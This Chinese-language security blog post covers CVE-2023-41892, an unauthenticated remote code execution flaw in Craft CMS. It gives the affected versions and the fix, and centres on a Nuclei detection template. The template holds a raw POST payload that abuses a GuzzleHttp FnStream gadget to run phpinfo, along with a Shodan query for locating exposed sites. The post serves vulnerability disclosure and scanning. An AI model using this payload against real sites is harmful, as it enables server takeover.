CVE-2023-41892|Craft CMS远程代码执行漏洞

2023-09-22 17:56:30 浏览数 (2)

0x00 前言

Craft CMS是一个开源的内容管理系统,它专注于用户友好的内容创建过程,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。

Craft界面简洁优雅,逻辑清晰明了,是一个高度自由,高度自定义设计的平台。虽然不需要专业的编程知识,要对模板语法有所了解才能很好的使用。

0x01 漏洞描述

Craft CMS是一个创造数字体验的平台。这是一个高影响、低复杂度的攻击向量。鼓励在4.4.15之前运行Craft安装的用户至少更新到该版本,以缓解问题。该问题已在Craft CMS 4.4.15中修复。

0x02 CVE编号

CVE-2023-41892

0x03 影响版本

Craft CMS >= 4.0.0-RC1

Craft CMS <= 4.4.14

0x04 漏洞详情

CVE-2023-41892.yaml

代码语言:javascript复制
id: CVE-2023-41892

info:
  name: CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
  reference:
    - https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
    - https://blog.calif.io/p/craftcms-rce
    - https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical
    - https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857
    - https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
    cvss-score: 10
    cve-id: CVE-2023-41892
    cwe-id: CWE-94
    epss-score: 0.00044
    epss-percentile: 0.08209
  metadata:
    max-request: 1
    verified: true
    publicwww-query: "craftcms"
    shodan-query: http.favicon.hash:-47932290
  tags: cve,cve2023,rce,unauth,craftcms

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        action=conditions/render&test[userCondition]=craftelementsconditionsusersUserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\GuzzleHttp\Psr7\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
    matchers:
      - type: word
        words:
          - "PHP Credits"
          - "PHP Group"
          - "CraftCMS"
        condition: and
        case-insensitive: true

0x05 参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-41892

0 人点赞